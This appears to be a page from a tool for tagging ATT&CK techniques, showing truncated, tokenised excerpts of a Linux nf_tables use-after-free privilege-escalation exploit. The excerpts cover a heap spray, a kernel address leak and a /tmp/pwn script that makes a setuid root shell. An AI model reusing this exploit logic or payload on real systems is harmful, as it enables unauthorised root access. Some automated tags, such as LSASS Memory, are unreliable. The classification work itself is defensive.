Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1068Exploitation for Privilege Escalation
79%
“chain ( ) in * the packet path — can access the freed nft _ base _ chain memory. the * freed object ( ~ 224 bytes ) resides in kmalloc - 256 and can be reclaimed * with user - controlled spray objects ( msg _ msg via msgsnd ). * * the exploit races a chain dump against the uaf tr…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1055.001Dynamic-link Library Injection
48%
“##────────────────────────────────────────────── * / struct race _ ctx { int nfnl _ fd ; / * nfnetlink socket for operations * / int dump _ fd ; / * nfnetlink socket for dump * / struct spray _ state spray ; volatile int uaf _ triggered ; volatile int dump _ started ; volatile in…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1068Exploitation for Privilege Escalation
47%
“kernel * address ( 0xffff8880... ), we ' ve hit the uaf * and are reading from sprayed msg _ msg data. * / uint64 _ t handle _ be = _ _ builtin _ bswap64 ( handle ) ; if ( ( handle _ be & 0xffff000000000000ull ) = = 0xffff000000000000ull ) { ctx - > leaked _ addr = handle _ be ; …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1574.013KernelCallbackTable
44%
“kernel * address ( 0xffff8880... ), we ' ve hit the uaf * and are reading from sprayed msg _ msg data. * / uint64 _ t handle _ be = _ _ builtin _ bswap64 ( handle ) ; if ( ( handle _ be & 0xffff000000000000ull ) = = 0xffff000000000000ull ) { ctx - > leaked _ addr = handle _ be ; …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1003.001LSASS Memory
32%
“##────── * / static int step _ setup ( struct race _ ctx * ctx ) { info ( " step 1 : creating user / net namespace... " ) ; if ( setup _ namespace ( ) < 0 ) return - 1 ; ok ( " namespace created, cap _ net _ admin obtained " ) ; / * open nfnetlink sockets * / ctx - > nfnl _ fd = …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.004Unix Shell
31%
“payload ( void ) { file * f ; / * create the helper script that will be called as root * / f = fopen ( " / tmp / pwn ", " w " ) ; if (! f ) return - 1 ; fprintf ( f, " #! / bin / sh \ n " ) ; fprintf ( f, " / bin / cp / bin / sh / tmp / rootsh \ n " ) ; fprintf ( f, " / bin / chm…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Linux nf_tables 6.19.3 - Local Privilege Escalation